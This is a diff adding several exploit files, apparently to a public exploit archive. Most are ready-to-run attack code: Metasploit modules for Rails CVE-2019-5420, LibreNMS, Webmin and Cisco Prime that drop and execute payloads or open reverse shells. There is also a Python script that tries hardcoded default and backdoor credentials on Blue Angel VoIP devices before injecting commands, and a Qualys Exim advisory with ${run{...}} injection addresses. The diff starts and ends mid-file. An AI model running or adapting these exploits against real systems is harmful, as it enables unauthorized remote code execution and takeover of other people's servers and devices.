+    Timeout.timeout(datastore['HTTPDELAY']) { super }
+  rescue Timeout::Error
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/46785.rb b/exploits/linux/remote/46785.rb
new file mode 100755
index 000000000..84e6084cd
--- /dev/null
+++ b/exploits/linux/remote/46785.rb
@@ -0,0 +1,225 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Ruby On Rails DoubleTap Development Mode secret_key_base Vulnerability',
+      'Description'    => %q{
+        This module exploits a vulnerability in Ruby on Rails. In development mode, a Rails
+        application would use its name as the secret_key_base, and can be easily extracted by
+        visiting an invalid resource for a path. As a result, this allows a remote user to
+        create and deliver a signed serialized payload, load it by the application, and gain
+        remote code execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'ooooooo_q', # Reported the vuln on hackerone
+          'mpgn',      # Proof-of-Concept
+          'sinn3r'     # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2019-5420' ],
+          [ 'URL', 'https://hackerone.com/reports/473888' ],
+          [ 'URL', 'https://github.com/mpgn/Rails-doubletap-RCE' ],
+          [ 'URL', 'https://groups.google.com/forum/#!searchin/rubyonrails-security/CVE-2019-5420/rubyonrails-security/IsQKvDqZdKw/UYgRCJz2CgAJ' ]
+        ],
+      'Platform'       => 'linux',
+      'Targets'        =>
+        [
+          [ 'Ruby on Rails 5.2 and prior', { } ]
+        ],
+      'DefaultOptions' =>
+        {
+          'RPORT' => 3000
+        },
+      'Notes'          =>
+        {
+          'AKA'         => [ 'doubletap' ],
+          'Stability'   => [ CRASH_SAFE  ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => 'Mar 13 2019',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),
+      ])
+  end
+
+  NO_RAILS_ROOT_MSG = 'No Rails.root info'
+
+  # These mocked classes are borrowed from Rails 5. I had to do this because Metasploit
+  # still uses Rails 4, and we don't really know when we will be able to upgrade it.
+
+  class Messages
+    class Metadata
+      def initialize(message, expires_at = nil, purpose = nil)
+        @message, @expires_at, @purpose = message, expires_at, purpose
+      end
+
+      def as_json(options = {})
+        { _rails: { message: @message, exp: @expires_at, pur: @purpose } }
+      end
+
+      def self.wrap(message, expires_at: nil, expires_in: nil, purpose: nil)
+        if expires_at || expires_in || purpose
+          ActiveSupport::JSON.encode new(encode(message), pick_expiry(expires_at, expires_in), purpose)
+        else
+          message
+        end
+      end
+
+      private
+
+      def self.pick_expiry(expires_at, expires_in)
+        if expires_at
+          expires_at.utc.iso8601(3)
+        elsif expires_in
+          Time.now.utc.advance(seconds: expires_in).iso8601(3)
+        end
+      end
+
+      def self.encode(message)
+        Rex::Text::encode_base64(message)
+      end
+    end
+  end
+
+  class MessageVerifier
+    def initialize(secret, options = {})
+      raise ArgumentError, 'Secret should not be nil.' unless secret
+      @secret = secret
+      @digest = options[:digest] || 'SHA1'
+      @serializer = options[:serializer] || Marshal
+    end
+
+    def generate(value, expires_at: nil, expires_in: nil, purpose: nil)
+      data = encode(Messages::Metadata.wrap(@serializer.dump(value), expires_at: expires_at, expires_in: expires_in, purpose: purpose))
+      "#{data}--#{generate_digest(data)}"
+    end
+
+    private
+
+    def generate_digest(data)
+      require "openssl" unless defined?(OpenSSL)
+      OpenSSL::HMAC.hexdigest(OpenSSL::Digest.const_get(@digest).new, @secret, data)
+    end
+
+    def encode(message)
+      Rex::Text::encode_base64(message)
+    end
+  end
+
+  def check
+    check_code = CheckCode::Safe
+    app_name = get_application_name
+    check_code = CheckCode::Appears unless app_name.blank?
+    test_payload = %Q|puts 1|
+    rails_payload = generate_rails_payload(app_name, test_payload)
+    result = send_serialized_payload(rails_payload)
+    check_code = CheckCode::Vulnerable if result
+    check_code
+  rescue Msf::Exploit::Failed => e
+    vprint_error(e.message)
+    return check_code if e.message.to_s.include? NO_RAILS_ROOT_MSG
+    CheckCode::Unknown
+  end
+
+  # Returns information about Rails.root if we retrieve an invalid path under rails.
+  def get_rails_root_info
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'rails', Rex::Text.rand_text_alphanumeric(32)),
+    })
+
+    fail_with(Failure::Unknown, 'No response from the server') unless res
+    html = res.get_html_document
+    rails_root_node = html.at('//code[contains(text(), "Rails.root:")]')
+    fail_with(Failure::NotVulnerable, NO_RAILS_ROOT_MSG) unless rails_root_node
+    root_info_value = rails_root_node.text.scan(/Rails.root: (.+)/).flatten.first
+    report_note(host: rhost, type: 'rails.root_info', data: root_info_value, update: :unique_data)
+    root_info_value
+  end
+
+  # Returns the application name based on Rails.root. It seems in development mode, the
+  # application name is used as a secret_key_base to encrypt/decrypt data.
+  def get_application_name
+    root_info = get_rails_root_info
+    root_info.split('/').last.capitalize
+  end
+
+  # Returns the stager code that writes the payload to disk so we can execute it.
+  def get_stager_code
+    b64_fname = "/tmp/#{Rex::Text.rand_text_alpha(6)}.bin"
+    bin_fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}.bin"
+    register_file_for_cleanup(b64_fname, bin_fname)
+    p = Rex::Text.encode_base64(generate_payload_exe)
+
+    c  = "File.open('#{b64_fname}', 'wb') { |f| f.write('#{p}') }; "
+    c << "%x(base64 --decode #{b64_fname} > #{bin_fname}); "
+    c << "%x(chmod +x #{bin_fname}); "
+    c << "%x(#{bin_fname})"
+    c
+  end
+
+  # Returns the serialized payload that is embedded with our malicious payload.
+  def generate_rails_payload(app_name, ruby_payload)
+    secret_key_base = Digest::MD5.hexdigest("#{app_name}::Application")
+    keygen = ActiveSupport::CachingKeyGenerator.new(ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000))
+    secret = keygen.generate_key('ActiveStorage')
+    verifier = MessageVerifier.new(secret)
+    erb = ERB.allocate
+    erb.instance_variable_set :@src, ruby_payload
+    erb.instance_variable_set :@filename, "1"
+    erb.instance_variable_set :@lineno, 1
+    dump_target = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result)
+    verifier.generate(dump_target, purpose: :blob_key)
+  end
+
+  # Sending the serialized payload
+  # If the payload fails, the server should return 404. If successful, then 200.
+  def send_serialized_payload(rails_payload)
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => "/rails/active_storage/disk/#{rails_payload}/test",
+    })
+
+    if res && res.code != 200
+      print_error("It doesn't look like the exploit worked. Server returned: #{res.code}.")
+      print_error('The expected response should be HTTP 200.')
+
+      # This indicates the server did not accept the payload
+      return false
+    end
+
+    # This is used to indicate the server accepted the payload
+    true
+  end
+
+  def exploit
+    print_status("Attempting to retrieve the application name...")
+    app_name = get_application_name
+    print_status("The application name is: #{app_name}")
+
+    stager = get_stager_code
+    print_status("Stager ready: #{stager.length} bytes")
+
+    rails_payload = generate_rails_payload(app_name, stager)
+    print_status("Sending serialized payload to target (#{rails_payload.length} bytes)")
+    send_serialized_payload(rails_payload)
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/46792.py b/exploits/linux/remote/46792.py
new file mode 100755
index 000000000..17187064c
--- /dev/null
+++ b/exploits/linux/remote/46792.py
@@ -0,0 +1,102 @@
+# Exploit Title: Blue Angel Software Suite - Authenticated Command Execution
+# Google Dork: N/A
+# Date: 02/05/2019
+# Exploit Author: Paolo Serracino 
+# Vendor Homepage: http://www.5vtechnologies.com
+# Software Link: N/A
+# Version: All
+# Tested on: Embedded Linux OS
+# CVE : N/A
+# Description: Blue Angel Software Suite, an application that runs on embedded devices for VOIP/SIP services is vulnerable to an authenticated 
+# command execution in ping command. All default accounts can be used to login and achieve command execution, including the guest one. 
+# Moreover there's another account, defined in the local file device.dat, that provides an apparently "backdoor" account.
+# A list of these accounts is hardcoded in the script.
+
+#/usr/bin/python
+import sys
+import requests
+
+
+def check_sw(target,port):
+
+  res = requests.get(target + ':' + port)
+
+  if '/cgi-bin/webctrl.cgi?action=index_page' in res.text:
+     return True
+  else:
+     print "[-] DOES NOT LOOK LIKE THE PAGE WE'RE LOOKING FOR"
+     return False
+
+def check_login(target,port,command):
+
+   if not check_sw(target,port):
+      sys.exit()
+
+   creds_common = [('blueangel','blueangel'), #the "backdoor" account
+                   ('root','abnareum10'),
+                   ('root','Admin@tbroad'),
+                   ('root','superuser'),
+                   ('user','user') ,
+                   ('guest','guest'),
+                   ]
+ 
+   for i in range(len(creds_common)):
+      postdata=[('action','login_authentication'),
+               ('redirect_action','sysinfo_page'),
+               ('login_username',creds_common[i][0]),
+               ('login_password',creds_common[i][1]),
+               ('B1','Login')
+               ]
+
+      res = requests.post(target + ':' + port + '/cgi-bin/webctrl.cgi',data=postdata)
+
+      if 'Set-Cookie' in res.headers:
+         cookie = res.headers.get('Set-Cookie')
+         print '[+] LOGGED IN WITH CREDENTIALS  ' + str(creds_common[i][0] + ' : ' + creds_common[i][1]) 
+         execute_cmd(target,port,cookie,command)  
+         return True
+
+
+def execute_cmd(target,port,cookie,cmd):
+
+   print '[+] EXECUTING COMMAND'
+   new_headers = ({'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',
+                 'Referer': target,
+                 'Cookie': cookie
+                })
+   res = requests.get(target + ':' + port + '/cgi-bin/webctrl.cgi?action=pingtest_update&ping_addr=127.0.0.1;' + cmd + '&B1=PING',headers=new_headers)
+   res_lines = res.text.splitlines()
+   result = []
+   copy = False
+
+   for line in res_lines:
+
+      if 'round-trip min/avg/max' in line:
+         copy = True
+      elif '</pre></body></html>' in line: 
+         copy = False
+      elif copy == True:
+         result.append(line)
+
+   print('[+] COMMAND RESPONSE')
+   print('------------------------------------------')
+
+   for r in result:
+      print r
+   print('------------------------------------------')
+
+
+def main():
+
+   if len(sys.argv) < 4:
+      print '[-] 3 ARGS: TARGET PORT SHELL_COMMAND'
+      sys.exit()
+   
+   target = sys.argv[1]   
+   port = sys.argv[2]
+   command = sys.argv[3]
+   if not check_login(target,port,command):
+      print '[-] COULD NOT FIND VALID CREDENTIALS'
+      
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/linux/remote/46970.rb b/exploits/linux/remote/46970.rb
new file mode 100755
index 000000000..c9c305baf
--- /dev/null
+++ b/exploits/linux/remote/46970.rb
@@ -0,0 +1,163 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'LibreNMS addhost Command Injection',
+      'Description'    => %q(
+         This module exploits a command injection vulnerability in the open source
+         network management software known as LibreNMS. The community parameter used
+         in a POST request to the addhost functionality is unsanitized. This parameter
+         is later used as part of a shell command that gets passed to the popen function
+         in capture.inc.php, which can result in execution of arbitrary code.
+
+         This module requires authentication to LibreNMS first.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'mhaskar',       # Vulnerability discovery and PoC
+        'Shelby Pace'    # Metasploit module
+      ],
+      'References'     =>
+        [
+          [ 'CVE', '2018-20434' ],
+          [ 'URL', 'https://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/' ],
+          [ 'URL', 'https://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d' ]
+        ],
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          [ 'Linux',
+            {
+              'Platform' => 'unix',
+              'DefaultOptions'  =>  { 'Payload' =>  'cmd/unix/reverse' }
+            }
+          ]
+        ],
+      'DisclosureDate' => '2018-12-16',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+    [
+      OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]),
+      OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]),
+      OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ])
+    ])
+  end
+
+  def login
+    login_uri = normalize_uri(target_uri.path, 'login')
+    res = send_request_cgi('method' =>  'GET', 'uri'  =>  login_uri)
+    fail_with(Failure::NotFound, 'Failed to access the login page') unless res && res.code == 200
+
+    cookies = res.get_cookies
+
+    login_res = send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  login_uri,
+      'cookie'    =>  cookies,
+      'vars_post' =>
+      {
+        'username'  =>  datastore['USERNAME'],
+        'password'  =>  datastore['PASSWORD']
+      }
+    )
+
+    fail_with(Failure::NoAccess, 'Failed to submit credentials to login page') unless login_res && login_res.code == 302
+
+    cookies = login_res.get_cookies
+    res = send_request_cgi('method' =>  'GET', 'uri'  =>  normalize_uri(target_uri.path), 'cookie' =>  cookies)
+    fail_with(Failure::NoAccess, 'Failed to log into LibreNMS') unless res && res.code == 200 && res.body.include?('Devices')
+
+    print_status('Successfully logged into LibreNMS. Storing credentials...')
+    store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+    login_res.get_cookies
+  end
+
+  def add_device(cookies)
+    add_uri = normalize_uri(target_uri.path, 'addhost')
+    @hostname = Rex::Text.rand_text_alpha(6...12)
+    comm_payload = "'; #{payload.encoded}#'"
+
+    res = send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  add_uri,
+      'cookie'    =>  cookies,
+      'vars_post'  =>
+      {
+        'snmp'            =>  'on',
+        'force_add'       =>  'on',
+        'snmpver'         =>  'v2c',
+        'hostname'        =>  @hostname,
+        'community'       =>  comm_payload,
+        'authalgo'        =>  'MD5',
+        'cryptoalgo'      =>  'AES',
+        'transport'       =>  'udp',
+        'port_assoc_mode' =>  'ifIndex'
+      }
+    )
+
+    fail_with(Failure::NotFound, 'Failed to add device') unless res && res.body.include?('Device added')
+    print_good("Successfully added device with hostname #{@hostname}")
+
+    host_id = res.get_html_document.search('div[@class="alert alert-success"]/a[@href]').text
+    fail_with(Failure::NotFound, "Couldn't retrieve the id for the device") if host_id.empty?
+    host_id = host_id.match(/(\d+)/).nil? ? nil : host_id.match(/(\d+)/)
+
+    fail_with(Failure::NotFound, 'Failed to retrieve a valid device id') if host_id.nil?
+
+    host_id
+  end
+
+  def del_device(id, cookies)
+    del_uri = normalize_uri(target_uri.path, 'delhost')
+    res = send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  del_uri,
+      'cookie'    =>  cookies,
+      'vars_post' =>
+      {
+        'id'      =>  id,
+        'confirm' =>  1
+      }
+    )
+
+    print_status('Unsure if device was deleted. No response received') unless res
+
+    if res.body.include?("Removed device #{@hostname.downcase}")
+      print_good("Successfully deleted device with hostname #{@hostname} and id ##{id}")
+    else
+      print_status('Failed to delete device. Manual deletion may be needed')
+    end
+  end
+
+  def exploit
+    exp_uri = normalize_uri(target_uri.path, 'ajax_output.php')
+    cookies = login
+
+    host_id = add_device(cookies)
+    send_request_cgi(
+      'method'    =>  'GET',
+      'uri'       =>  exp_uri,
+      'cookie'    =>  cookies,
+      'vars_get'  =>
+      {
+        'id'        =>  'capture',
+        'format'    =>  'text',
+        'type'      =>  'snmpwalk',
+        'hostname'  =>  @hostname
+      }
+    )
+
+    del_device(host_id, cookies)
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/46974.txt b/exploits/linux/remote/46974.txt
new file mode 100644
index 000000000..9feb8c1be
--- /dev/null
+++ b/exploits/linux/remote/46974.txt
@@ -0,0 +1,157 @@
+Qualys Security Advisory
+
+The Return of the WIZard: RCE in Exim (CVE-2019-10149)
+
+
+========================================================================
+Contents
+========================================================================
+
+Summary
+Local exploitation
+Remote exploitation
+- Non-default configurations
+- Default configuration
+Acknowledgments
+Timeline
+
+    Boromir: "What is this new devilry?"
+    Gandalf: "A Balrog. A demon of the Ancient World."
+        -- The Lord of the Rings: The Fellowship of the Ring
+
+
+========================================================================
+Summary
+========================================================================
+
+During a code review of the latest changes in the Exim mail server
+(https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability
+in versions 4.87 to 4.91 (inclusive). In this particular case, RCE means
+Remote *Command* Execution, not Remote Code Execution: an attacker can
+execute arbitrary commands with execv(), as root; no memory corruption
+or ROP (Return-Oriented Programming) is involved.
+
+This vulnerability is exploitable instantly by a local attacker (and by
+a remote attacker in certain non-default configurations). To remotely
+exploit this vulnerability in the default configuration, an attacker
+must keep a connection to the vulnerable server open for 7 days (by
+transmitting one byte every few minutes). However, because of the
+extreme complexity of Exim's code, we cannot guarantee that this
+exploitation method is unique; faster methods may exist.
+
+Exim is vulnerable by default since version 4.87 (released on April 6,
+2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and
+older versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled
+manually. Surprisingly, this vulnerability was fixed in version 4.92
+(released on February 10, 2019):
+
+https://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8...
+https://bugs.exim.org/show_bug.cgi?id=2310
+
+but was not identified as a security vulnerability, and most operating
+systems are therefore affected. For example, we exploit an up-to-date
+Debian distribution (9.9) in this advisory.
+
+
+========================================================================
+Local exploitation
+========================================================================
+
+The vulnerable code is located in deliver_message():
+
+6122 #ifndef DISABLE_EVENT
+6123       if (process_recipients != RECIP_ACCEPT)
+6124         {
+6125         uschar * save_local =  deliver_localpart;
+6126         const uschar * save_domain = deliver_domain;
+6127
+6128         deliver_localpart = expand_string(
+6129                       string_sprintf("${local_part:%s}", new->address));
+6130         deliver_domain =    expand_string(
+6131                       string_sprintf("${domain:%s}", new->address));
+6132
+6133         (void) event_raise(event_action,
+6134                       US"msg:fail:internal", new->message);
+6135
+6136         deliver_localpart = save_local;
+6137         deliver_domain =    save_domain;
+6138         }
+6139 #endif
+
+Because expand_string() recognizes the "${run{<command> <args>}}"
+expansion item, and because new->address is the recipient of the mail
+that is being delivered, a local attacker can simply send a mail to
+"${run{...}}@localhost" (where "localhost" is one of Exim's
+local_domains) and execute arbitrary commands, as root
+(deliver_drop_privilege is false, by default):
+
+[...]
+
+
+========================================================================
+Remote exploitation
+========================================================================
+
+Our local-exploitation method does not work remotely, because the
+"verify = recipient" ACL (Access-Control List) in Exim's default
+configuration requires the local part of the recipient's address (the
+part that precedes the @ sign) to be the name of a local user:
+
+[...]
+
+------------------------------------------------------------------------
+Non-default configurations
+------------------------------------------------------------------------
+
+We eventually devised an elaborate method for exploiting Exim remotely
+in its default configuration, but we first identified various
+non-default configurations that are easy to exploit remotely:
+
+- If the "verify = recipient" ACL was removed manually by an
+  administrator (maybe to prevent username enumeration via RCPT TO),
+  then our local-exploitation method also works remotely.
+
+- If Exim was configured to recognize tags in the local part of the
+  recipient's address (via "local_part_suffix = +* : -*" for example),
+  then a remote attacker can simply reuse our local-exploitation method
+  with an RCPT TO "balrog+${run{...}}@localhost" (where "balrog" is the
+  name of a local user).
+
+- If Exim was configured to relay mail to a remote domain, as a
+  secondary MX (Mail eXchange), then a remote attacker can simply reuse
+  our local-exploitation method with an RCPT TO "${run{...}}@khazad.dum"
+  (where "khazad.dum" is one of Exim's relay_to_domains). Indeed, the
+  "verify = recipient" ACL can only check the domain part of a remote
+  address (the part that follows the @ sign), not the local part.
+
+------------------------------------------------------------------------
+Default configuration
+------------------------------------------------------------------------
+
+[...]
+
+
+========================================================================
+Acknowledgments
+========================================================================
+
+We thank Exim's developers, Solar Designer, and the members of
+distros@openwall.
+
+"The Return of the WIZard" is a reference to Sendmail's ancient WIZ and
+DEBUG vulnerabilities:
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145
+https://seclists.org/bugtraq/1995/Feb/56
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095
+http://www.cheswick.com/ches/papers/berferd.pdf
+
+
+========================================================================
+Timeline
+========================================================================
+
+2019-05-27: Advisory sent to security@exim.
+
+2019-05-28: Advisory sent to distros@openwall.
\ No newline at end of file
diff --git a/exploits/linux/remote/46984.rb b/exploits/linux/remote/46984.rb
new file mode 100755
index 000000000..985a603f1
--- /dev/null
+++ b/exploits/linux/remote/46984.rb
@@ -0,0 +1,156 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Webmin Package Updates Remote Command Execution',
+      'Description'    => %q(
+        This module exploits an arbitrary command execution vulnerability in Webmin
+        1.910 and lower versions. Any user authorized to the "Package Updates"
+        module can execute arbitrary commands with root privileges.
+      ),
+      'Author'         => [
+        'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2019-12840'],
+          ['URL', 'https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html']
+        ],
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 512,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd'
+            }
+        },
+      'DefaultOptions' =>
+        {
+          'RPORT' => 10000,
+          'SSL'   => false,
+          'PAYLOAD' => 'cmd/unix/reverse_perl'
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [['Webmin <= 1.910', {}]],
+      'DisclosureDate' => 'May 16 2019',
+      'DefaultTarget'  => 0)
+    )
+    register_options [
+        OptString.new('USERNAME',  [true, 'Webmin Username']),
+        OptString.new('PASSWORD',  [true, 'Webmin Password']),
+        OptString.new('TARGETURI',  [true, 'Base path for Webmin application', '/'])
+    ]
+  end
+
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+
+  def login
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'session_login.cgi'),
+      'cookie' => 'testing=1', # it must be used for "Error - No cookies"
+      'vars_post' => {
+        'page' => '',
+        'user' => datastore['USERNAME'],
+        'pass' => datastore['PASSWORD']
+      }
+    })
+
+    if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/
+      return $1
+    end
+
+    return nil unless res
+    ''
+  end
+
+  def check
+    cookie = login
+    return CheckCode::Detected if cookie == ''
+    return CheckCode::Unknown if cookie.nil?
+
+    vprint_status('Attempting to execute...')
+    # check version
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, "sysinfo.cgi"),
+      'cookie'  => "sid=#{cookie}",
+      'vars_get' => { "xnavigation" => "1" }
+    })
+
+    if res && res.code == 302 && res.body
+      version = res.body.split("- Webmin 1.")[1]
+      return CheckCode::Detected if version.nil?
+      version = version.split(" ")[0]
+      if version <= "910"
+        # check package update priv
+        res = send_request_cgi({
+          'uri'     => normalize_uri(target_uri.path, "package-updates/"),
+          'cookie'  => "sid=#{cookie}"
+        })
+
+        if res && res.code == 200 && res.body =~ /Software Package Update/
+          print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
+          return CheckCode::Vulnerable
+        end
+      end
+    end
+    print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<")
+    print_status("Please try with another user account!")
+    CheckCode::Safe
+  end
+
+  def exploit
+    cookie = login
+    if cookie == '' || cookie.nil?
+      fail_with(Failure::Unknown, 'Failed to retrieve session cookie')
+    end
+    print_good("Session cookie: #{cookie}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
+      'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" },
+      'cookie' => "sid=#{cookie}"
+    )
+    unless res && res.code == 200
+      fail_with(Failure::Unknown, 'Request failed')
+    end
+
+    print_status("Attempting to execute the payload...")
+    run_update(cookie)
+  end
+
+  def run_update(cookie)
+    @b64p = Rex::Text.encode_base64(payload.encoded)
+    perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"'
+    payload = Rex::Text.uri_encode(perl_payload)
+
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'cookie' => "sid=#{cookie}",
+        'ctype'  => 'application/x-www-form-urlencoded',
+        'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
+        'headers' =>
+          {
+            'Referer' => "#{peer}/package-updates/?xnavigation=1"
+          },
+        'data' => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages"
+      })
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/47016.rb b/exploits/linux/remote/47016.rb
new file mode 100755
index 000000000..eff57afd1
--- /dev/null
+++ b/exploits/linux/remote/47016.rb
@@ -0,0 +1,202 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability',
+      'Description'    => %q{
+        This module exploits a vulnerability found in Cisco Prime Infrastructure. The issue is that
+        the TarArchive Java class the HA Health Monitor component uses does not check for any
+        directory traversals while unpacking a Tar file, which can be abused by a remote user to
+        leverage the UploadServlet class to upload a JSP payload to the Apache Tomcat's web apps
+        directory, and gain arbitrary remote code execution. Note that authentication is not
+        required to exploit this vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Steven Seeley', # Original discovery, PoC
+          'sinn3r'         # Metasploit module
+        ],
+      'Platform'       => 'linux',
+      'Arch'           => ARCH_X86,
+      'Targets'        =>
+        [
+          [ 'Cisco Prime Infrastructure 3.4.0.0', { } ]
+        ],
+      'References'     =>
+        [
+          ['CVE', '2019-1821'],
+          ['URL', 'https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html'],
+          ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce'],
+          ['URL', 'https://srcincite.io/advisories/src-2019-0034/'],
+          ['URL', 'https://srcincite.io/pocs/src-2019-0034.py.txt']
+        ],
+      'DefaultOptions' =>
+        {
+          'RPORT' => 8082,
+          'SSL'   => true,
+
+        },
+      'Notes'          =>
+        {
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => 'May 15 2019',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptPort.new('WEBPORT', [true, 'Cisco Prime Infrastructure web interface', 443]),
+        OptString.new('TARGETURI', [true, 'The route for Cisco Prime Infrastructure web interface', '/'])
+      ])
+  end
+
+  class CPITarArchive
+    attr_reader :data
+    attr_reader :jsp_name
+    attr_reader :tar_name
+    attr_reader :stager
+    attr_reader :length
+
+    def initialize(name, stager)
+      @jsp_name = "#{name}.jsp"
+      @tar_name = "#{name}.tar"
+      @stager = stager
+      @data = make
+      @length = data.length
+    end
+
+    def make
+      data = ''
+      path = "../../opt/CSCOlumos/tomcat/webapps/ROOT/#{jsp_name}"
+      tar = StringIO.new
+      Rex::Tar::Writer.new(tar) do |t|
+        t.add_file(path, 0644) do |f|
+          f.write(stager)
+        end
+      end
+      tar.seek(0)
+      data = tar.read
+      tar.close
+      data
+    end
+  end
+
+  def check
+    res = send_request_cgi({
+      'rport'  => datastore['WEBPORT'],
+      'SSL'    => true,
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'webacs', 'pages', 'common', 'login.jsp')
+    })
+
+    unless res
+      vprint_error('No response from the server')
+      return CheckCode::Unknown
+    end
+
+    if res.code == 200 && res.headers['Server'] && res.headers['Server'] == 'Prime'
+      return CheckCode::Detected
+    end
+
+    CheckCode::Safe
+  end
+
+  def get_jsp_stager(out_file, bin_data)
+    # For some reason, some of the bytes tend to get lost at the end.
+    # Not really sure why, but some extra bytes are added to ensure the integrity
+    # of the code. This file will get deleted during cleanup anyway.
+    %Q|<%@ page import="java.io.*" %>
+    <%
+      String data = "#{Rex::Text.to_hex(bin_data, '')}";
+      FileOutputStream outputstream = new FileOutputStream("#{out_file}");
+      int numbytes = data.length();
+      byte[] bytes = new byte[numbytes/2];
+      for (int counter = 0; counter < numbytes; counter += 2)
+      {
+        char char1 = (char) data.charAt(counter);
+        char char2 = (char) data.charAt(counter + 1);
+        int comb = Character.digit(char1, 16) & 0xff;
+        comb <<= 4;
+        comb += Character.digit(char2, 16) & 0xff;
+        bytes[counter/2] = (byte)comb;
+      }
+      outputstream.write(bytes);
+      outputstream.close();
+      try {
+        Runtime.getRuntime().exec("chmod +x #{out_file}");
+        Runtime.getRuntime().exec("#{out_file}");
+      } catch (IOException exp) {}
+    %>#{Rex::Text.rand_text_alpha(30)}|
+  end
+
+  def make_tar
+    elf_name = "/tmp/#{Rex::Text.rand_text_alpha(10)}.bin"
+    register_file_for_cleanup(elf_name)
+    elf = generate_payload_exe(code: payload.encoded)
+    jsp_stager = get_jsp_stager(elf_name, elf)
+    tar_name = Rex::Text.rand_text_alpha(10)
